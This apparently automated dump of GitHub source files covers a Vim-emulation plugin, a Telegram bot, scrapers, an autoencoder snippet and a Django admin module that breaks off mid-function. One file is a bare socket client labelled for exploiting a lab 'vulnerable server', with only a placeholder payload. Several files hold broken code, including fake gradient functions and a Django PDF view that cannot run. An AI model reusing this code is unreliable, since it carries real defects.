dest_non_blank)\n elif dest_non_blank < s.a:\n return Region(s.a, dest_non_blank)\n elif dest_non_blank > s.b and s.a > s.b:\n return Region(s.a - 1, dest_non_blank + 1)\n return Region(s.a, dest_non_blank + 1)\n elif mode == VISUAL_LINE:\n if dest < s.a and s.a < s.b:\n return Region(view.full_line(s.a).b, dest)\n elif dest < s.a:\n return Region(s.a, dest)\n elif dest >= s.a and s.a > s.b:\n return Region(view.full_line(s.a - 1).a, view.full_line(dest).b)\n return Region(s.a, view.full_line(dest).b)\n return s\n\n jumplist_update(view)\n regions_transformer(view, f)\n jumplist_update(view)\n show_if_not_visible(view)\n\n\ndef _goto_modification(action: str, view, mode: str, count: int) -> None:\n with wrapscan(view, forward=(action == 'next')):\n if int(version()) >= 3189:\n for i in range(count):\n view.run_command(action + '_modification')\n\n a = view.sel()[0].a\n if view.substr(a) == '\\n':\n if not view.line(a).empty():\n a += 1\n\n set_selection(view, a)\n enter_normal_mode(view, mode)\n else:\n # TODO Remove DEPRECATED code, deprecated since build 3189\n view.run_command('git_gutter_' + action + '_change', {'count': count, 'wrap': False})\n line = view.line(view.sel()[0].b)\n if line.size() > 0:\n pt = view.find('^\\\\s*', line.begin()).end()\n if pt != line.begin():\n set_selection(view, pt)\n\n\ndef goto_next_change(view, mode: str, count: int) -> None:\n _goto_modification('next', view, mode, count)\n\n\ndef goto_prev_change(view, mode: str, count: int) -> None:\n _goto_modification('prev', view, mode, count)\n\n\ndef goto_next_mispelled_word(view, mode: str, count: int) -> None:\n with wrapscan(view):\n for i in range(count):\n view.run_command('next_misspelling')\n\n regions_transform_to_normal_mode(view)\n\n\ndef goto_prev_mispelled_word(view, mode: str, count: int) -> None:\n with wrapscan(view, forward=False):\n for i in range(count):\n view.run_command('prev_misspelling')\n\n regions_transform_to_normal_mode(view)\n\n\ndef goto_prev_target(view, mode: str, count: int, target: str) -> None:\n targets = {\n '{': ('\\\\{', '\\\\}'),\n '(': ('\\\\(', '\\\\)'),\n }\n\n brackets = targets.get(target)\n if not brackets or mode not in (NORMAL, VISUAL, VISUAL_LINE):\n ui_bell()\n return\n\n def f(view, s):\n if mode == NORMAL:\n start = s.b\n if view.substr(start) == target:\n start -= 1\n\n prev_target = find_prev_lone_bracket(view, start, brackets)\n if prev_target is not None:\n return Region(prev_target.a)\n\n elif mode in (VISUAL, VISUAL_LINE):\n start = s.b\n if s.b > s.a:\n start -= 1\n\n if view.substr(start) == target:\n start -= 1\n\n prev_target = find_prev_lone_bracket(view, start, brackets)\n if prev_target:\n if mode == VISUAL:\n resolve_visual_target(s, prev_target.a)\n elif mode == VISUAL_LINE:\n resolve_visual_line_target(view, s, prev_target.a)\n\n return s\n\n regions_transformer(view, f)\n\n\ndef goto_next_target(view, mode: str, count: int, target: str) -> None:\n targets = {\n '}': ('\\\\{', '\\\\}'),\n ')': ('\\\\(', '\\\\)'),\n }\n\n brackets = targets.get(target)\n\n if not brackets or mode not in (NORMAL, VISUAL, VISUAL_LINE):\n ui_bell()\n return\n\n def f(view, s):\n if mode == NORMAL:\n start = s.b\n if view.substr(start) == target:\n start += 1\n\n bracket = find_next_lone_bracket(view, start, brackets, count)\n if bracket is not None:\n s = Region(bracket.a)\n\n elif mode in (VISUAL, VISUAL_LINE):\n start = s.b\n if s.b <= s.a and view.substr(start) == target:\n start += 1\n\n next_target = find_next_lone_bracket(view, start, brackets)\n if next_target:\n if mode == VISUAL:\n resolve_visual_target(s, next_target.a)\n elif mode == VISUAL_LINE:\n resolve_visual_line_target(view, s, next_target.a)\n\n return s\n\n regions_transformer(view, f)\n","repo_name":"emilBeBri/xucinet-tmp","sub_path":"NeoVintageous/nv/goto.py","file_name":"goto.py","file_ext":"py","file_size_in_byte":7476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20543431752","text":"import socket\nimport sys\n\n# create socket, of type INET, TCP\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nprint ('Socket Created')\n\n# define host for connection\nhost = ('192.168.159.128')\nport = 12626\nremote_ip = socket.gethostbyname(host)\nprint (\"IP Address of the vulnerbale server xmas, is \" + remote_ip)\n\n# connect to host \ns.connect((remote_ip, port))\nprint(\"socket connecte to \" + host)\n\n# receive and print server side communication\nreply = s.recv(1024)\nprint (reply)\n\n# send message from client \nmessage = 'code here'\ns.sendall(message)\n\n","repo_name":"donaldashdown/Client-side-socket-script-Exploitation","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18106227185","text":"from datetime import datetime, timedelta\nimport typing\n\nfrom aiogram import types\n\nfrom . import callback_data\nfrom .. import dependencies\n\n\n# NOTE: Telegram API has max size of callback data\n# It is 64 bytes, so use sortcuts\n_TOMORROW_MOGRIN = 'TM'\n_TOMORROW_EVENING = 'TE'\n_SATURDAY_MORNING = 'SM'\n\n\ndef build_remind_keyboard() -> types.InlineKeyboardMarkup:\n keys = []\n method = callback_data.Methods.LATER\n buttons = (\n ('Завтра утром', _TOMORROW_MOGRIN),\n ('Завтра вечером', _TOMORROW_EVENING),\n ('В субботу утром', _SATURDAY_MORNING),\n )\n for text, when in buttons:\n keys.append(\n types.InlineKeyboardButton(\n text=text,\n callback_data=callback_data.CallbackData(\n method=method,\n payload={'when': when},\n ).serialize()\n ),\n )\n return types.InlineKeyboardMarkup(inline_keyboard=[keys])\n\n\ndef find_next_saturday(now: datetime) -> datetime:\n saturday = 5\n weekday = now.weekday()\n if weekday < saturday:\n delta = saturday - now.weekday()\n elif weekday == saturday:\n delta = 7\n else:\n delta = 6\n return now + timedelta(days=delta)\n\n\ndef _get_queue_time(now: datetime, when: str) -> typing.Optional[datetime]:\n if when == _TOMORROW_MOGRIN:\n result = now + timedelta(days=1)\n return result.replace(hour=9, minute=0)\n if when == _TOMORROW_EVENING:\n result = now + timedelta(days=1)\n return result.replace(hour=21, minute=0)\n if when == _SATURDAY_MORNING:\n result = find_next_saturday(now).replace(hour=9, minute=0)\n return result\n return None\n\n\nasync def button_callback(\n deps: dependencies.Dependencies,\n user_id: str,\n message_id: int,\n data: callback_data.CallbackData,\n):\n now = datetime.now()\n until = _get_queue_time(now, data.payload['when'])\n if not until:\n return False\n queues = await deps.get_queues()\n await queues.enqueue_job(\n 'remind_later',\n user_id,\n message_id,\n _defer_until=until,\n )\n return True\n","repo_name":"IsThisLoss/manga-notify","sub_path":"manga_notify/bot/remind_later.py","file_name":"remind_later.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71932009448","text":"#!/usr/bin/python3\nfrom add_0 import add\n\n#Assigning a value 1 to variable \"a\"\na = 1\n\n#Assigning a value 2 to variable \"b\"\nb = 2\n\n# Calling the \"add\" function from \"add_0\" with module \"a\" $ \"b\"\nresult = add(a, b)\n\n# Printing the formated string and giving the result\nprint(\"{} + {} = {}\".format(a, b, result))\n","repo_name":"Emo-Efe/alx-higher_level_programming","sub_path":"0x02-python-import_modules/0-add.py","file_name":"0-add.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24958792415","text":"import selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.chrome.options import Options\nfrom time import sleep\nimport time, os\nfrom datetime import datetime\nimport csv\nimport sys\n\n\ndef get_serp_by_query(driver, query, serp_folder_path):\n \"\"\"\n This function can search Google for query.\n Parameters:\n query - a string that contains the phrase that will be searched\n serp_folder_path - a path to folder where resulting serps are saved\n \"\"\"\n # perform the search, because we need the location link to show\n url = f\"https://google.com/search?q={query}\"\n driver.get(url)\n sleep(2)\n # Access the content of the page\n htmlPage = driver.page_source\n filename = query.replace('/','')\n with open(f\"{serp_folder_path}/{filename}.html\", 'w', encoding='utf-8') as output:\n output.write(htmlPage)\n \n\ndef search_all_queries(queries_file_csv):\n # Set the driver path\n driverpath ='driver/chromedriver'\n chrome_options = webdriver.ChromeOptions()\n\n category_folder_path = queries_file_csv.split('_')[1].split('.')[0]\n serp_folder_path = str(datetime.now()).split()[0]\n \n if not os.path.isdir(category_folder_path):\n os.mkdir(f'{category_folder_path}')\n os.mkdir(f'{category_folder_path}/{serp_folder_path}')\n\n queries = []\n with open(queries_file_csv, 'r') as inputF:\n reader = csv.reader(inputF)\n for row in reader:\n queries.append(row[0])\n\n # Create a new instance of the driver for every search\n driver = webdriver.Chrome(executable_path=driverpath, options=chrome_options)\n for query in queries:\n get_serp_by_query(driver, query, f\"{category_folder_path}/{serp_folder_path}\")\n driver.close()\n\nif __name__ == \"__main__\":\n search_all_queries(sys.argv[1]) #parameter is a path to a csv file with a query list, like 'list_Gender Identities.csv' ","repo_name":"malika07032/serp_scraper","sub_path":"get_serps.py","file_name":"get_serps.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33056991679","text":"from __future__ import absolute_import\nimport csv\nimport shutil\nfrom django.conf import settings\n\nfrom celery import Celery\nfrom celery.utils.log import get_task_logger\nfrom twython import Twython\n\nfrom twitter_archive import creds\nfrom twitter_archive.models import TwitterSearch\n\napp = Celery(broker='amqp://')\nlogger = get_task_logger(__name__)\n\n\n@app.task\ndef delete_tweets(path):\n shutil.rmtree(path, ignore_errors=True)\n\n\n@app.task\ndef collect_tweets():\n for search in TwitterSearch.objects.filter(active=True):\n user = search.user\n twitter = Twython(\n creds.APP_KEY,\n creds.APP_SECRET,\n user.twitterprofile.oauth_token,\n user.twitterprofile.oauth_secret,\n )\n # Run the search\n result = twitter.search(\n q=search.query,\n result_type=search.type,\n lang='en',\n count=100 if settings.MAX_TWEETS - search.collected > 100 else settings.MAX_TWEETS - search.collected,\n since_id=search.last_tweet_id,\n )\n\n # Write the tweets\n with open(search.csv_path, 'a') as out:\n writer = csv.writer(out)\n for tweet in result['statuses']:\n user = tweet.get('user', {})\n writer.writerow([\n tweet.get('created_at', '').encode('utf-8'),\n tweet.get('id_str', '').encode('utf-8'),\n tweet.get('in_reply_to_user_id_str', ''),\n tweet.get('retweet_count', 0),\n user.get('name', '').encode('utf-8'),\n user.get('profile_image_url', '').encode('utf-8'),\n user.get('location', '').encode('utf-8'),\n tweet.get('coordinates', ''),\n tweet.get('text', '').encode('utf-8'),\n ])\n\n # Save stats\n search.last_tweet_id = result['search_metadata']['max_id_str']\n search.collected += len(result['statuses'])\n if search.collected >= settings.MAX_TWEETS:\n search.active = False\n search.save()\n","repo_name":"Kapiche/twitter_archive","sub_path":"twitter_archive/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10746016073","text":"import numpy as np\r\n\r\ndef f(w,b,x):\r\n\treturn 1.0 / (1.0 + np.exp(-(w*x + b)))\r\n\t\r\ndef grad_w(w,b,x):\r\n\tfx = f(w,b,x)\r\n\treturn fx\r\n\r\ndef grad_b(w,b,x):\r\n\tfx = f(w,b,x)\r\n\treturn fx\r\n\t\r\ndef loss(w,b):\r\n\terror =0\r\n\t\r\n\terror += 0.5 * (w - b) ** 2\r\n\treturn error\r\n\r\n\r\nparameters1 = np.load('autoencoder1.npy')\r\nw_e_1 = parameters1[0]\r\nb_1 = parameters1[1]\r\nw_d_1 = parameters1[2]\r\ne_1 = parameters1[3]\r\nw = grad_w(b_1,w_e_1,e_1)\r\n#b= grad_b(w_e_1,b_1,w_d_1)\r\n\r\nprint(b_1)\r\nparameters2 = np.load('autoencoder2.npy')\r\nw_e_2 = parameters2[0]\r\nb_2 = parameters2[1]\r\nw_d_2 = parameters2[2]\r\ne_2 = parameters2[3]","repo_name":"princeamitlali/gradient_descent","sub_path":"deep/autoencoder11.py","file_name":"autoencoder11.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9168712994","text":"from django.contrib import admin\nfrom tasks.models import Task, TaskDocument, Schedule, PartialTaskPay, PaymentAhead\nfrom dynamic_costs.models import DynamicCost, ApartmentDynamicCost\nfrom nomenclatures.models import TaskType, Priority\nfrom django.contrib.auth.models import User\nfrom entrances.models import Apartment, Entrance\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.admin import SimpleListFilter\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Q\nimport datetime\nfrom django.utils.encoding import force_text\nfrom django.http import HttpResponse\nfrom django.conf.urls import url, patterns\nfrom django.forms.extras.widgets import SelectDateWidget\nfrom django.db import models\nfrom vhodove.helper import first_day_of_month\nfrom django.views.generic import View\n\nfrom vhodove.utils import render_to_pdf #created in step 4\n\nclass ApartmentsListFilter(SimpleListFilter):\n title = _('Apartment')\n parameter_name = 'apartment'\n\n def lookups(self, request, model_admin):\n return Apartment.objects.filter(entrance_id=request.GET.get('entrance__id__exact', 0)).values_list('id', 'apartment')\n\n def queryset(self, request, queryset):\n if self.value():\n return queryset.filter(apartment_id=self.value())\n else:\n return queryset\n\n# Rajdeep Code\n\nclass TimespanListFilter(SimpleListFilter):\n title = _('Timespan')\n parameter_name = 'timespan'\n\n def lookups(self, request, model_admin):\n return (\n ('past',_('Till Now')),\n ('future',_('From Now'))\n )\n\n def queryset(self, request, queryset):\n if self.value() == 'past':\n return queryset.filter(updated_at__lte=datetime.date.today())\n\n if self.value() == 'future':\n return queryset.filter(updated_at__gte=datetime.date.today())\n\n# End\n\n\nclass FloorListFilter(SimpleListFilter):\n title = _('Floor')\n parameter_name = 'floor'\n\n def lookups(self, request, model_admin):\n return Apartment.FLOORS\n\n def queryset(self, request, queryset):\n if self.value():\n return queryset.filter(apartment__floor=self.value())\n else:\n return queryset\n\n\nclass ResolvedListFilter(SimpleListFilter):\n title = _('Resolved')\n parameter_name = 'resolved__exact'\n\n def lookups(self, request, model_admin):\n return ((2, _('Yes')), (1, _('No')), (-1, _('All')))\n\n def choices(self, cl):\n for lookup, title in self.lookup_choices:\n yield {\n 'selected': self.value() == force_text(lookup),\n 'query_string': cl.get_query_string({\n self.parameter_name: lookup,\n }, []),\n 'display': title,\n }\n\n def queryset(self, request, queryset):\n if self.value() and self.value() != '-1':\n value = int(self.value()) - 1\n return queryset.filter(resolved=value)\n else:\n return queryset\n\nclass EntranceListFilter(SimpleListFilter):\n title = _('Entrance')\n parameter_name = 'entrance__id__exact'\n\n def lookups(self, request, model_admin):\n return [(c.id, \"%s. %s\" %(c.position, c.title)) for c in Entrance.objects.filter(active=True)]\n\n def queryset(self, request, queryset):\n if self.value():\n return queryset.filter(entrance__id__exact=self.value())\n else:\n return queryset\n\nclass ResolvedByAdminListFilter(SimpleListFilter):\n title = _('Resolved by admin')\n parameter_name = 'resolved_by_admin__exact'\n\n def lookups(self, request, model_admin):\n return ((2, _('Yes')), (1, _('No')), (-1, _('All')))\n\n def choices(self, cl):\n for lookup, title in self.lookup_choices:\n yield {\n 'selected': self.value() == force_text(lookup),\n 'query_string': cl.get_query_string({\n self.parameter_name: lookup,\n }, []),\n 'display': title,\n }\n\n def queryset(self, request, queryset):\n if self.value() and self.value() != '-1':\n value = int(self.value()) - 1\n return queryset.filter(resolved_by_admin=value)\n else:\n return queryset\n\nclass HasEasyPayListFilter(SimpleListFilter):\n title = _('Easypay code')\n parameter_name = 'easypay'\n\n def lookups(self, request, model_admin):\n return ((2, _('Yes')), (1, _('No')), (-1, _('All')))\n\n def choices(self, cl):\n for lookup, title in self.lookup_choices:\n yield {\n 'selected': self.value() == force_text(lookup),\n 'query_string': cl.get_query_string({\n self.parameter_name: lookup,\n }, []),\n 'display': title,\n }\n\n def queryset(self, request, queryset):\n if self.value() and self.value() != '-1':\n value = int(self.value())\n if value == 2:\n return queryset.filter(easypay_code__isnull=False)\n else:\n return queryset.filter(easypay_code__isnull=True)\n\n else:\n return queryset\n\n\nclass TaskDocumentInlines(admin.TabularInline):\n model = TaskDocument\n extra = 0\n\n\nclass PartialTaskPayInlines(admin.TabularInline):\n model = PartialTaskPay\n extra = 0\n\n readonly_fields = ['assignee', 'created_at']\n\n#Rajdeep Code Start\nclass PartialTaskPayAdmin(admin.ModelAdmin):\n from rangefilter.filter import DateRangeFilter, DateTimeRangeFilter\n search_fields = ('assignee__username','assignee__first_name','assignee__last_name')\n list_display = ('assignee','task','created_at','price','easypay_code')\n list_filter = (\n ('created_at', DateRangeFilter),\n # ('created_at', DateTimeRangeFilter),\n )\n#End\n\n\nclass PaymentAheadAdmin(admin.ModelAdmin):\n list_display = ('entrance', 'apartment', 'assignee', 'from_date', 'period')\n list_filter = (EntranceListFilter, ApartmentsListFilter, 'assignee')\n list_display_links = None\n #readonly_fields = ['from_date',]\n\n def get_form(self, request, obj=None, **kwargs):\n y = datetime.date.today().year\n m = datetime.date.today().month + 1\n if m == 13:\n m = 1\n y = y+1\n form = super(PaymentAheadAdmin, self).get_form(request, obj, **kwargs)\n form.base_fields['from_date'].initial = first_day_of_month(datetime.date(y, m, 1))\n return form\n\n\n def get_apartment_payment_fee(self, request):\n try:\n o = Apartment.objects.get(pk=request.GET.get('apartment_id'))\n return HttpResponse(o.monthly_fee)\n except:\n return HttpResponse(0)\n\n def get_urls(self):\n urls = super(PaymentAheadAdmin, self).get_urls()\n my_urls = patterns('',\n url(\n r'^get_apartment_payment_fee/$',\n self.admin_site.admin_view(self.get_apartment_payment_fee)\n ),\n )\n return my_urls + urls\n\n\n def has_change_permission(self, request, obj=None):\n return obj is None\n\n def has_delete_permission1(self, request, obj=None):\n return False\n\n def save_model(self, request, obj, form, change):\n obj.assignee = request.user\n obj.save()\n\n\nclass TaskAdmin(admin.ModelAdmin):\n search_fields = ('title', 'entrance__title', 'apartment__apartment')\n list_display = ('id', 'title', 'entrance', 'apartment')\n list_display_links = ('title', 'entrance', 'apartment')\n # list_filter = (TimespanListFilter,)\n list_per_page = 50\n actions = ['mark_as_resolved_by_admin', 'mark_as_resolved', 'unmark_as_resolved_by_admin', 'unmark_as_resolved']\n\n def mark_as_resolved_by_admin(self, request, queryset):\n queryset.update(resolved_by_admin=True)\n mark_as_resolved_by_admin.short_description = _(\"Mark as resolved by admin\")\n\n def mark_as_resolved(self, request, queryset):\n queryset.update(resolved=True)\n mark_as_resolved.short_description = _(\"Mark as resolved\")\n\n def unmark_as_resolved_by_admin(self, request, queryset):\n queryset.update(resolved_by_admin=False)\n unmark_as_resolved_by_admin.short_description = _(\"Unmark as resolved by admin\")\n\n def unmark_as_resolved(self, request, queryset):\n queryset.update(resolved=False)\n unmark_as_resolved.short_description = _(\"Unmark as resolved\")\n\n\n formfield_overrides = {\n models.DateField: {'widget': SelectDateWidget(years=('2015','2016','2017','2018','2019','2020'))},\n }\n\n def get_actions(self, request):\n actions = super(TaskAdmin, self).get_actions(request)\n if 'delete_selected' in actions and not request.user.is_superuser:\n del actions['delete_selected']\n\n if not request.user.is_superuser:\n del actions['mark_as_resolved_by_admin']\n del actions['mark_as_resolved']\n del actions['unmark_as_resolved_by_admin']\n del actions['unmark_as_resolved']\n return actions\n\n def formfield_for_foreignkey(self, db_field, request=None, **kwargs):\n field = super(TaskAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)\n if db_field.name == 'task_type':\n if request.user.is_superuser or 4 in request.user.groups.all().values_list('id', flat=True):\n field.queryset = field.queryset.all()\n else:\n field.queryset = field.queryset.filter(for_cachiers=True)\n\n if db_field.name == 'entrance':\n if request.user.is_superuser or 4 in request.user.groups.all().values_list('id', flat=True):\n field.queryset = field.queryset.all()\n else:\n entrance_ids = Schedule.objects.filter(assignee=request.user, from_date__lte=datetime.datetime.now, to_date__gte=datetime.datetime.now).values_list('entrance_id')\n qs = qs.filter(Q(assignee=request.user) | Q(assignee__isnull=True, entrance_id__in=entrance_ids))\n # field.queryset = field.queryset.filter(id__in=entrance_ids)\n\n return field\n\n def save_formset(self, request, form, formset, change):\n instances = formset.save(commit=False)\n\n for instance in instances:\n if isinstance(instance, PartialTaskPay): #Check if it is the correct type of inline\n if not instance.assignee_id:\n instance.assignee = request.user\n instance.save()\n super(TaskAdmin, self).save_formset(request, form, formset, change)\n\n def changelist_view(self, request, extra_context=None):\n self.assignees_list = {x['id']:x for x in User.objects.filter(is_staff=True).values('id','first_name','last_name')}\n self.priorities_list = dict(Priority.objects.all().values_list('id','color'))\n self.task_types_list = dict(TaskType.objects.all().values_list('id','title'))\n self.apartments_list = {x['id']:x for x in Apartment.objects.filter(id__in=self.get_queryset(request).values_list('apartment_id', flat=True)).values('id','floor','contact_person','contact_phone', 'contact_email', 'pay_online', 'apartment', 'number_of_occupants')}\n if request.user.is_superuser or 4 in request.user.groups.all().values_list('id', flat=True):\n # self.list_filter = (ResolvedListFilter, ResolvedByAdminListFilter, HasEasyPayListFilter, EntranceListFilter, ApartmentsListFilter, FloorListFilter, 'assignee', 'task_type', 'priority')\n\n # Rajdeep Code Start\n self.list_filter = (TimespanListFilter,ResolvedListFilter, ResolvedByAdminListFilter, HasEasyPayListFilter, EntranceListFilter, ApartmentsListFilter, FloorListFilter, 'assignee', 'task_type', 'priority')\n\n # End\n self.list_editable = ('document',)\n if 'entrance__id__exact' in request.GET:\n if request.GET.get('resolved_by_admin__exact',0) == '2':\n self.list_per_page = 50\n else:\n self.list_per_page = 50000\n self.list_display = ('get_priority', 'title', 'get_apartment', 'get_floor', 'get_contact_info', 'get_occupants','price', 'partial_paid_total', 'get_date', 'get_assignee', 'normalized_time', 'get_task_type','resolved', 'resolved_by_admin')\n else:\n self.list_per_page = 50\n self.list_display = ('get_priority', 'title', 'entrance', 'get_apartment', 'get_floor', 'get_contact_info', 'get_occupants', 'price', 'partial_paid_total', 'get_date', 'get_assignee', 'normalized_time', 'get_task_type','resolved', 'resolved_by_admin')\n\n if not request.GET.has_key('resolved__exact'):\n q = request.GET.copy()\n q['resolved__exact'] = '1'\n request.GET = q\n request.META['QUERY_STRING'] = request.GET.urlencode()\n\n if not request.GET.has_key('resolved_by_admin__exact'):\n q = request.GET.copy()\n q['resolved_by_admin__exact'] = '1'\n request.GET = q\n request.META['QUERY_STRING'] = request.GET.urlencode()\n else:\n # self.list_filter = (ResolvedListFilter, EntranceListFilter, ApartmentsListFilter, FloorListFilter) #old\n\n # Rajdeep Code Start\n if request.user.is_staff:\n self.list_filter = (ResolvedListFilter, EntranceListFilter, ApartmentsListFilter, FloorListFilter)\n else:\n self.list_filter = (ResolvedListFilter, ApartmentsListFilter, FloorListFilter)\n # End\n self.list_editable = ('document',)\n if 'entrance__id__exact' in request.GET:\n self.list_display = ('get_priority', 'title', 'get_apartment', 'get_floor', 'get_contact_info','get_occupants', 'price', 'partial_paid_total', 'date', 'get_task_type','resolved')\n else:\n self.list_display = ('get_priority', 'title', 'entrance', 'get_apartment', 'get_floor', 'get_contact_info', 'get_occupants', 'price', 'partial_paid_total', 'date', 'get_task_type','resolved')\n\n\n if not request.GET.has_key('resolved__exact'):\n q = request.GET.copy()\n q['resolved__exact'] = '1'\n request.GET = q\n request.META['QUERY_STRING'] = request.GET.urlencode()\n\n extra_context = extra_context or {}\n from django.db.models import Sum\n ChangeList = self.get_changelist(request)\n cl = ChangeList(request, self.model, self.list_display, self.list_display_links, self.list_filter, self.date_hierarchy, self.search_fields, self.list_select_related, self.list_per_page, self.list_max_show_all, self.list_editable, self)\n qs = cl.get_queryset(request)\n sum_price = qs.aggregate(Sum('price'))['price__sum']\n sum_partial =qs.aggregate(Sum('partial_paid_total'))['partial_paid_total__sum']\n sum_price = sum_price if sum_price else 0\n sum_partial = sum_partial if sum_partial else 0\n extra_context['total'] = sum_price - sum_partial\n extra_context['has_entrance_filter'] = 'entrance__id__exact' in request.GET and self.list_per_page > 50\n return super(TaskAdmin, self).changelist_view(request, extra_context)\n\n def get_contact_info(self, obj):\n if obj.apartment_id:\n return 'Easypay: 101%s
%s
%s
%s
%s' % (reverse('admin:entrances_apartment_change', args=[obj.apartment_id]), obj.apartment_id, self.apartments_list[obj.apartment_id]['contact_person'], self.apartments_list[obj.apartment_id]['contact_phone'] or '-', self.apartments_list[obj.apartment_id]['contact_email'] or '-', _('Pay online') if self.apartments_list[obj.apartment_id]['pay_online'] else '')\n else:\n return None\n get_contact_info.short_description = _('Get Contact info')\n get_contact_info.allow_tags = True\n\n def get_priority(self, obj):\n return '' % (self.priorities_list[obj.priority_id])\n\n get_priority.short_description = ''\n get_priority.allow_tags = True\n\n def normalized_time(self, obj):\n return obj.updated_at.strftime(\"%d.%m.%Y\")\n normalized_time.short_description = _('Updated at')\n\n def get_apartment(self, obj):\n if obj.apartment_id:\n return self.apartments_list[obj.apartment_id]['apartment']\n else:\n return None\n get_apartment.short_description = _('Apartment')\n get_apartment.admin_order_field = 'apartment__apartment_integer'\n\n def get_floor(self, obj):\n if obj.apartment_id:\n return self.apartments_list[obj.apartment_id]['floor']\n else:\n return None\n get_floor.admin_order_field = 'apartment__floor'\n get_floor.short_description = _('Floor')\n\n\n def get_task_type(self, obj):\n return self.task_types_list[obj.task_type_id]\n get_task_type.short_description = _('Task type')\n\n def get_assignee(self, obj):\n if obj.assignee_id and obj.assignee_id in self.assignees_list:\n return \"%s %s\" %(self.assignees_list[obj.assignee_id]['first_name'], self.assignees_list[obj.assignee_id]['last_name'])\n else:\n return ''\n get_assignee.short_description = _('User')\n\n\n\n\n def get_occupants(self, obj):\n if obj.apartment_id:\n return self.apartments_list[obj.apartment_id]['number_of_occupants']\n else:\n return None\n get_occupants.admin_order_field = 'apartment__number_of_occupants'\n get_occupants.short_description = _('Number of occupants')\n\n def readonly_clickable_document(self, instance):\n return '%s' %(instance.document.url,instance.document)\n\n readonly_clickable_document.short_description = _('Document')\n readonly_clickable_document.allow_tags = True\n\n def get_readonly_fields(self, request, obj=None):\n if obj and obj.resolved_by_admin and not request.user.is_superuser:\n return list(set(\n [field.name if field.editable and field.name not in ['document', 'can_pay_partial', 'can_pay', 'price_for_resolve'] else 'id' for field in self.opts.local_fields] +\n [field.name for field in self.opts.local_many_to_many] +\n ['readonly_clickable_document']\n ))\n\n return self.readonly_fields\n\n def get_form(self, request, obj=None, **kwargs):\n self.readonly_fields = []\n self.exclude = ['templates', 'can_pay', 'can_pay_partial']\n if obj and obj.resolved_by_admin and not request.user.is_superuser:\n self.exclude.append('document')\n if obj:\n self.readonly_fields = ['task_type', 'apartment', 'entrance', 'easypay_code']\n\n #if not obj.task_type.can_pay:\n # self.exclude.append('price')\n\n if not obj.task_type.can_pay_partial:\n #self.exclude.append('partial_paid')\n self.inlines = [TaskDocumentInlines]\n else:\n self.inlines = [PartialTaskPayInlines, TaskDocumentInlines]\n\n if not request.user.is_superuser and 4 not in request.user.groups.all().values_list('id', flat=True):\n self.exclude.append('resolved_by_admin')\n self.exclude.append('assignee')\n self.exclude.append('apartment')\n if obj is not None and obj.task_type.can_pay_partial:\n self.readonly_fields.append('resolved')\n self.readonly_fields.append('partial_paid_total')\n self.readonly_fields.append('price')\n\n if 2 not in request.user.groups.all().values_list('id', flat=True) and obj is not None:\n self.readonly_fields.append('priority')\n self.readonly_fields.append('title')\n\n\n return super(TaskAdmin, self).get_form(request, obj, **kwargs)\n\n def save_model(self, request, obj, form, change):\n if not change and not request.user.is_superuser and 4 not in request.user.groups.all().values_list('id', flat=True):\n obj.assignee = request.user\n\n if obj.resolved and not obj.assignee and not request.user.is_superuser and 4 not in request.user.groups.all().values_list('id', flat=True):\n obj.assignee = request.user\n\n obj.save()\n\n def get_queryset(self, request):\n qs = super(TaskAdmin, self).get_queryset(request)\n if not request.user.is_superuser and 4 not in request.user.groups.all().values_list('id', flat=True):\n entrance_ids = Schedule.objects.filter(assignee=request.user, from_date__lte=datetime.datetime.now, to_date__gte=datetime.datetime.now).values_list('entrance_id')\n qs = qs.filter(Q(assignee=request.user) | Q(assignee__isnull=True, entrance_id__in=entrance_ids) | Q(updated_at__gte=datetime.date.today()))\n qs = qs.filter(Q(updated_at__lte=datetime.date.today()))\n return qs\n\nclass GeneratePDF(View, models.Model):\n def get(self, request, *args, **kwargs):\n template = get_template('invoice.html')\n entrance = select2.fields.ForeignKey(Entrance, verbose_name=Entrance._meta.verbose_name, blank=True, null=True, limit_choices_to={'active': True})\n assignee = models.ForeignKey(User, verbose_name=_('User'), blank=True, null=True, limit_choices_to={'is_staff': True})\n from_date = models.DateField(_('From date'), default=first_day_of_month)\n to_date = models.DateField(_('To date'), default=last_day_of_month)\n visit_date = models.DateField(_('Visit date'), default=datetime.date.today)\n period = models.IntegerField(_('Period'))\n price = models.DecimalField(_('Price'), blank=True, null=True, decimal_places=2, max_digits=8)\n partial_paid = models.DecimalField(_('Partial paid'), blank=True, null=True, decimal_places=2, max_digits=8, editable=False)\n context = {\n \"for_apartment\": Apartment,\n \"for_entrance\": entrance,\n \"partial_paid\": partial_paid,\n \"period\": period,\n \"amount\": price,\n \"cashier\": assignee,\n \"today\": visit_date,\n }\n html = template.render(context)\n pdf = render_to_pdf('invoice.html', context)\n if pdf:\n response = HttpResponse(pdf, content_type='application/pdf')\n filename = \"Invoice_%s.pdf\" %(\"12341231\")\n content = \"inline; filename='%s'\" %(filename)\n download = request.GET.get(\"download\")\n if download:\n content = \"attachment; filename='%s'\" %(filename)\n response['Content-Disposition'] = content\n return response\n return HttpResponse(\"Not found\")\n\n\nclass ScheduleAdmin(admin.ModelAdmin):\n def changelist_view(self, request, extra_context=None):\n if request.user.is_superuser or 4 in request.user.groups.all().values_list('id', flat=True):\n 